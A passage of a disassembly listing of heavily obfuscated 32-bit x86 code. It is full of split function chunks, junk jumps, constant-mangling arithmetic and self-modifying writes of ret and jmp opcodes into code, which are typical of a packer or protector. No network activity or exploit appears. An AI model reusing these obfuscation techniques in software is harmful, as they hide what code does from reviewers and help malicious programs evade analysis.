; FUNCTION CHUNK AT 00441F24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426E0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00445725 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445868 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004494E3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453512 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456CE3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458D37 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459FC0 SIZE 00000005 BYTES
xchg edx, [esp+0]
mov ebp, edx
pop edx
mov eax, ds:dword_448200
or eax, eax
jnz loc_456CE3
jmp loc_459FC0
sub_449B8E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_449BA7: ; CODE XREF: sub_455060:loc_4410A8j
cmp al, 0A4h
jz loc_44B519
jmp loc_450283
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
loc_449BB4: ; CODE XREF: ut7h7i2x:loc_4482CBj
add esi, 0A1749C3Ch
xor eax, esi
push offset loc_4548CF
jmp locret_446DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A21
loc_449BC6: ; CODE XREF: sub_443A21+10j
and edi, ds:4000F1h
add edi, 0E3D006CFh
or edi, 0F3081E85h
xor edi, 0F7AC1F9Bh
push offset loc_453968
jmp nullsub_539
; END OF FUNCTION CHUNK FOR sub_443A21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC6F
loc_449BE8: ; CODE XREF: sub_44EC6F:loc_456EDBj
jl loc_453B64
jp loc_43DA76
add eax, esi
xor edx, edi
jmp loc_453B5F
; END OF FUNCTION CHUNK FOR sub_44EC6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_449BFD: ; CODE XREF: sub_43C0DA:loc_445158j
mov esi, [edi]
jmp sub_445BB7
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
loc_449C04: ; CODE XREF: ut7h7i2x:0044391Cj
mov esi, edx
xchg esi, [esp]
; START OF FUNCTION CHUNK FOR sub_444A12
loc_449C09: ; CODE XREF: sub_444A12:loc_4478FDj
push offset loc_455D1F
jmp loc_44F2C4
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_449C13: ; CODE XREF: sub_4524FE:loc_447E91j
cmp dword ptr [ebp-8], 0
jnz loc_456D16
loc_449C1D: ; CODE XREF: sub_44D255-67E6j
; ut7h7i2x:00456D10j
jnb loc_45AAEB
cmp dword ptr [ebp-1Ch], 66h
call sub_45AAD1
; END OF FUNCTION CHUNK FOR sub_4524FE
; =============== S U B R O U T I N E =======================================
sub_449C2C proc near ; CODE XREF: ut7h7i2x:00439EA1p
; ut7h7i2x:0044E966j
xchg ecx, [esp+0]
pop ecx
mov byte ptr [eax], 0C3h
jmp loc_44F5D9
sub_449C2C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call nullsub_229
jmp ds:dword_41D0DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_449C43: ; CODE XREF: sub_43EF73+4595j
jmp nullsub_330
; END OF FUNCTION CHUNK FOR sub_43EF73
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD "+" TO EXPAND]
db 0B5h, 0EDh, 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_449C4D: ; CODE XREF: ut7h7i2x:loc_452F1Ej
add eax, 7FF40780h
xchg eax, [esp]
jmp sub_43D797
; =============== S U B R O U T I N E =======================================
sub_449C5B proc near ; CODE XREF: sub_447D87p
; ut7h7i2x:0045A95Ej
xchg eax, [esp+0]
pop eax
call sub_449C6F
jmp ds:off_41D078
sub_449C5B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_449C6A: ; CODE XREF: sub_43DBEC-2D94j
jmp loc_44F6FD
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_449C6F proc near ; CODE XREF: sub_449C6F-CF86j
; sub_445E9E:loc_43D0A1j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CCE6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043D409 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443312 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00445025 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00445C12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044757D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0FA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C190 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458AF5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458BB5 SIZE 00000016 BYTES
pop edx
jmp loc_445025
sub_449C6F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0B6h, 73h, 0F3h
dword_449C78 dd 0 ; DATA XREF: sub_444C41:loc_44A131w
; ut7h7i2x:loc_45389Fr
dword_449C7C dd 924E25EAh, 7145A893h, 1B1B32h ; DATA XREF: sub_43CAF4+5o
; ut7h7i2x:00453905o
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_449C88: ; CODE XREF: sub_456E7D+15j
jmp loc_439F70
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
jno loc_45718A
push 89770B87h
pop edx
sub edx, 0E7567644h
jmp loc_44ED83
; ---------------------------------------------------------------------------
sub eax, 5EF8A3D3h
xor eax, 0BFD17D46h
rol eax, 19h
jmp loc_4548D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EE57
loc_449CB8: ; CODE XREF: sub_44EE57j
push 0E72476D4h
pop eax
and eax, 0D405D080h
jnz loc_4589C1
; END OF FUNCTION CHUNK FOR sub_44EE57
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_449CCA: ; CODE XREF: sub_43C0DA+1DDC2j
jmp loc_44E580
; END OF FUNCTION CHUNK FOR sub_43C0DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_461. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_449CD0: ; CODE XREF: ut7h7i2x:00446EE0j
jmp loc_455CEE
; =============== S U B R O U T I N E =======================================
sub_449CD5 proc near ; CODE XREF: sub_444273-3886j
push ebx
xchg ecx, [eax]
push eax
jns loc_441D32
sub_449CD5 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_444273
loc_449CDF: ; CODE XREF: sub_444273:loc_4409E5j
add edx, 0F01744Eh
add edx, ebp
add edx, 492E223Eh
mov edx, [edx]
jmp loc_45A62D
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_449CF4: ; CODE XREF: sub_43D021+1A08Aj
and edi, esi
push edi
jmp loc_455715
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_449CFC: ; CODE XREF: sub_445056-BAE2j
jg loc_44FB18
loc_449D02: ; CODE XREF: sub_445056:loc_43C192j
call sub_453D8B
push offset sub_44949C
jmp nullsub_453
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_449D11: ; CODE XREF: sub_43A218:loc_44341Bj
; sub_43A218+D7D2j
mov eax, [esp+4+var_4]
push eax
call sub_44124A
; END OF FUNCTION CHUNK FOR sub_43A218
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_449D1A: ; CODE XREF: sub_43AA94+10F42j
jmp loc_43F432
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_449D1F: ; CODE XREF: ut7h7i2x:0044789Bj
push offset sub_43F506
jmp loc_44E5A6
; ---------------------------------------------------------------------------
loc_449D29: ; DATA XREF: sub_4417AF:loc_43D259o
xchg edi, [esp]
mov ecx, edi
pop edi
xchg ebx, [esp]
mov ebp, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455775
loc_449D36: ; CODE XREF: sub_455775-E938j
jmp loc_43DC9F
; END OF FUNCTION CHUNK FOR sub_455775
; =============== S U B R O U T I N E =======================================
sub_449D3B proc near ; CODE XREF: sub_444EAA-B4B5p
; sub_43CA2D:loc_43CA3Ej ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043A58A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DDE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044242A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443100 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004439A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004447FD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004479A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449693 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B3D2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D85B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F225 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450963 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450FFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045105E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A4F6 SIZE 00000012 BYTES
push ebp
jmp loc_44B3D2
sub_449D3B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_449D41: ; CODE XREF: sub_446320+777Aj
jl loc_44E6A2
loc_449D47: ; CODE XREF: sub_446320:loc_447020j
mov eax, 0DD960900h
call sub_43AA94
sub eax, 0AAD5E8EFh
rol eax, 1Bh
push edi
jmp loc_455DFA
; END OF FUNCTION CHUNK FOR sub_446320
; =============== S U B R O U T I N E =======================================
sub_449D60 proc near ; CODE XREF: ut7h7i2x:0043C334j
; ut7h7i2x:loc_4582F6p
; FUNCTION CHUNK AT 0043A872 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044226D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00442CFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444870 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BB4D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044DE02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F6E3 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push esi
pop ebp
pop esi
mov eax, ds:dword_44A8AC
or eax, eax
jnz loc_44F6E3
jmp loc_43A872
sub_449D60 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add esi, ebx
jmp sub_44F17E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_525. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_449D82: ; CODE XREF: sub_44825D-52EBj
jmp loc_45AD27
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_449D87: ; CODE XREF: sub_451900+Cj
mov eax, [eax]
mov eax, [eax+4]
test eax, eax
jle loc_44DB15
jmp loc_451D61
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
shr ecx, 18h
jmp loc_4473C6
; ---------------------------------------------------------------------------
xchg eax, edx
or ecx, 46480D03h
jmp sub_4572A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4395FB
loc_449DAE: ; CODE XREF: sub_4395FB:loc_44B97Dj
or eax, 3B876372h
add eax, 0AA637E06h
push offset loc_459ECD
jmp loc_43DE5E
; END OF FUNCTION CHUNK FOR sub_4395FB
; =============== S U B R O U T I N E =======================================
sub_449DC4 proc near ; CODE XREF: ut7h7i2x:00441B03j
; sub_44602A+5364p
; FUNCTION CHUNK AT 0043923E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EBFE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004467C3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448253 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C00F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E21D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452FC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045700E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458AAC SIZE 00000019 BYTES
xchg edx, [esp+0]
loc_449DC7: ; CODE XREF: sub_44F43B:loc_44801Cj
pop edx
sub al, 99h
mov edx, [ebp-4]
loc_449DCD: ; CODE XREF: sub_457A0D:loc_43FA83j
jmp loc_43923E
sub_449DC4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop eax
jmp sub_443A21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457565
loc_449DD8: ; CODE XREF: sub_457565-1A518j
mov ecx, 0B5A6B7E5h
add ebp, 58719534h
; END OF FUNCTION CHUNK FOR sub_457565
; START OF FUNCTION CHUNK FOR sub_452AE2
loc_449DE3: ; CODE XREF: sub_452AE2:loc_4512C2j
; sub_457565:loc_45756Bj
jnb loc_45642B
push 0C2221CD6h
pop eax
sub eax, 0F35414C4h
loc_449DF5: ; CODE XREF: ut7h7i2x:loc_444FF2j
push offset sub_4543E9
jmp nullsub_246
; END OF FUNCTION CHUNK FOR sub_452AE2
; =============== S U B R O U T I N E =======================================
sub_449DFF proc near ; CODE XREF: ut7h7i2x:00448094j
; ut7h7i2x:00458C66p
; FUNCTION CHUNK AT 00442F97 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045770D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push esi
mov esi, eax
xchg esi, [esp+0]
push ecx
jmp loc_45770D
sub_449DFF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_449E0F: ; CODE XREF: sub_444A4D:loc_43C0ECj
add ecx, 0A7DBE8A8h
mov [ecx], eax
pop ecx
lea eax, loc_44A648
mov byte ptr [eax], 0C3h
jmp loc_44A648
; END OF FUNCTION CHUNK FOR sub_444A4D
; =============== S U B R O U T I N E =======================================
sub_449E26 proc near ; CODE XREF: sub_41946E+67p
; sub_449E26+5j
; DATA XREF: ...
call sub_453FFB
jmp ds:off_41D1EC
sub_449E26 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_449E31: ; CODE XREF: sub_444A4D+FA71j
jmp nullsub_384
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_449E36: ; CODE XREF: sub_44AA54-14ABj
jmp loc_442B13
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_449E3B: ; CODE XREF: ut7h7i2x:0043EBEDj
; sub_453D8B:loc_44A183j
add edi, 0F9C1DCE7h
mov [edi], eax
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_449E45: ; CODE XREF: sub_45601B+146Dj
jmp loc_43F2E3
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_449E4A: ; CODE XREF: sub_4431FF+120A8j
jmp loc_43E447
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_449E4F: ; CODE XREF: sub_448CDC+6j
rol eax, 0Ah
push eax
retn
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453C2C
loc_449E54: ; CODE XREF: sub_453C2C+1j
jmp loc_450B05
; END OF FUNCTION CHUNK FOR sub_453C2C
; =============== S U B R O U T I N E =======================================
sub_449E59 proc near ; CODE XREF: sub_45A070+9p
; FUNCTION CHUNK AT 00455F42 SIZE 00000005 BYTES
push offset sub_43DBEC
jmp loc_455F42
sub_449E59 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_449E63: ; CODE XREF: sub_44865D+11j
jnz loc_440E17
jmp loc_4446DB
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
mov edx, 0F9A79DECh
call sub_44ED9F
loc_449E78: ; CODE XREF: ut7h7i2x:004466DCj
push eax
ror eax, 1Ch
jmp loc_45182A
; =============== S U B R O U T I N E =======================================
sub_449E81 proc near ; CODE XREF: ut7h7i2x:004413C0j
; ut7h7i2x:0044251Dp
; FUNCTION CHUNK AT 0043F784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045033D SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
mov ds:dword_41D138, eax
lea eax, nullsub_41
jmp loc_43F784
sub_449E81 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_449E96 proc near ; CODE XREF: sub_44A5AB-E501p
; ut7h7i2x:0043DF24j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
; FUNCTION CHUNK AT 0043C2C5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FE7C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004405F3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044210C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004427C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004428F1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443B8B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445C1A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004460F8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447988 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A35D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044A965 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B76B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044BAD8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D14B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D1B4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D91B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EA83 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450CAF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004515DC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452AF3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004541F0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454B3E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454F45 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004552E1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004554DA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045675D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC22 SIZE 0000000C BYTES
xchg eax, [esp+0]
pop eax
cmp byte ptr [eax], 0
jnz loc_4427C0
jmp loc_447988
sub_449E96 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_449EA8: ; CODE XREF: sub_440944:loc_44FADCj
; sub_440944+1A0B4j
mov eax, 33F214AFh
call sub_44C42A
loc_449EB2: ; CODE XREF: sub_45A8EC+Bj
jmp nullsub_258
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_449EB7: ; CODE XREF: sub_444273-269Cj
jmp nullsub_444
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445CE9
loc_449EBC: ; CODE XREF: sub_445CE9:loc_43A5A4j
push offset loc_4409C7
jmp loc_4502DA
; END OF FUNCTION CHUNK FOR sub_445CE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_449EC6: ; CODE XREF: sub_4442CC:loc_44660Cj
; ut7h7i2x:00449A90j
jz loc_455A8E
jmp loc_458D2B
; END OF FUNCTION CHUNK FOR sub_4442CC
; =============== S U B R O U T I N E =======================================
sub_449ED1 proc near ; CODE XREF: sub_41A4A6+A5p
; sub_41A4A6+1B6p ...
call sub_449EE1
jmp ds:off_41D018
sub_449ED1 endp
; ---------------------------------------------------------------------------
loc_449EDC: ; CODE XREF: ut7h7i2x:00443996j
jmp sub_43C39B
; =============== S U B R O U T I N E =======================================
sub_449EE1 proc near ; CODE XREF: sub_449ED1p
; ut7h7i2x:loc_44AC2Cj ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00443C2D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004449FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AAB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F972 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045174A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045598E SIZE 0000000F BYTES
pop edx
js loc_44F980
mov eax, [esp-4+arg_0]
push esi
mov esi, edx
jmp loc_4461AA
sub_449EE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_449EF3: ; CODE XREF: sub_452CBB-7083j
mov ecx, 0DFF45C72h
pop esi
jmp loc_450D51
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_449EFE: ; CODE XREF: sub_439B27+13FBEj
or edi, ebx
pop ebx
loc_449F01: ; CODE XREF: sub_439B27:loc_450CEEj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43F1BB
jmp loc_44D314
; END OF FUNCTION CHUNK FOR sub_439B27
; =============== S U B R O U T I N E =======================================
sub_449F12 proc near ; CODE XREF: sub_447CBE+814p
; ut7h7i2x:0045A8D7j
xchg ecx, [esp+0]
pop ecx
pop ebp
retn
sub_449F12 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_449F18: ; CODE XREF: sub_439BF8+15CBBj
jmp loc_458206
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_449F1D: ; CODE XREF: sub_43D021+1A19j
jmp loc_4453D1
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FEA
loc_449F22: ; CODE XREF: sub_445FEA:loc_456FCDj
mov byte ptr [eax], 0E9h
pop eax
xchg eax, [esp-4+arg_0]
jmp nullsub_502
; END OF FUNCTION CHUNK FOR sub_445FEA
; ---------------------------------------------------------------------------
push edx
push 0E6552346h
jmp loc_45876D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_449F39: ; CODE XREF: sub_43EF73:loc_44E586j
jnz loc_4577CC
jmp loc_4502CF
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
ror ebx, 12h
jmp sub_43AF2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_449F4C: ; CODE XREF: sub_4459EE:loc_4568F2j
; DATA XREF: sub_450087o
pop edx
jo loc_43F8ED
mov eax, [esp+0]
push edx
call sub_4508DB
jmp loc_43F931
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_449F61: ; CODE XREF: ut7h7i2x:0043D59Ej
; sub_45742F:loc_4413A0j
pop edx
add edx, 3DB05935h
or edx, 368E3C82h
add edx, 80227D67h
xor eax, edx
pop edx
push edx
jmp loc_4450D1
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451971
loc_449F7D: ; CODE XREF: sub_451971-DD00j
popf
xchg edi, [esp+0]
jmp loc_44EF18
; END OF FUNCTION CHUNK FOR sub_451971
; ---------------------------------------------------------------------------
loc_449F86: ; CODE XREF: ut7h7i2x:004542F7j
imul byte ptr [edx]
cmp al, 0A4h
jz loc_453CF5
jmp loc_43B2DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_449F96: ; CODE XREF: sub_43A218+1EB0j
jmp loc_43C077
; END OF FUNCTION CHUNK FOR sub_43A218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_449F9B: ; CODE XREF: sub_440CEC:loc_4556E8j
xor ebx, 3623ADB9h
call sub_454C15
loc_449FA6: ; CODE XREF: sub_444374+11DF3j
jmp loc_459BC0
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_449FAB: ; CODE XREF: sub_446ACE-5A17j
jmp nullsub_72
; END OF FUNCTION CHUNK FOR sub_446ACE
; =============== S U B R O U T I N E =======================================
sub_449FB0 proc near ; DATA XREF: sub_439FD5+17945o
; FUNCTION CHUNK AT 0043B2A4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004536CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F33 SIZE 0000000B BYTES
push eax
call sub_43CA2D
or eax, eax
jnz loc_43C0FB
jmp loc_4536CF
sub_449FB0 endp
; ---------------------------------------------------------------------------
locret_449FC3: ; CODE XREF: ut7h7i2x:0043E9C3j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_449FC4: ; CODE XREF: sub_448321-CE98j
jmp loc_43B520
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_449FC9: ; CODE XREF: ut7h7i2x:loc_454728j
cmp ecx, 0B9170013h
jmp loc_43EB30
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_454. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_449FD5 proc near ; CODE XREF: sub_4393B6+41ACp
; sub_44AC40+4E5Ej
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B90B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442416 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443763 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441DC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448056 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E9D0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FC13 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450DFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A76 SIZE 0000000D BYTES
jns sub_43A90F
push edi
mov edi, ebp
jmp loc_454A76
sub_449FD5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_449FE3: ; CODE XREF: sub_43CA2D+72FEj
mov edi, ebp
loc_449FE5: ; CODE XREF: ut7h7i2x:loc_4572BDj
call sub_449FF0
retn
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_449FEB: ; CODE XREF: sub_445056+9B7Ej
jmp nullsub_454
; END OF FUNCTION CHUNK FOR sub_445056
; =============== S U B R O U T I N E =======================================
sub_449FF0 proc near ; CODE XREF: sub_43CA2D:loc_449FE5p
; sub_459772-B017j
var_4 = dword ptr -4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00444B0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446665 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E291 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450BD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458539 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1E1 SIZE 00000008 BYTES
jnb loc_44E291
push edx
jmp loc_446665
sub_449FF0 endp
; =============== S U B R O U T I N E =======================================
sub_449FFC proc near ; CODE XREF: ut7h7i2x:00441D93j
; sub_45A79F:loc_452E6Fp
; FUNCTION CHUNK AT 0043EFFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459E36 SIZE 0000001C BYTES
xchg esi, [esp+0]
pop esi
sub al, 99h
push 350BB162h
pop edx
add edx, 7568F31Ah
jmp loc_43EFFB
sub_449FFC endp ; sp-analysis failed
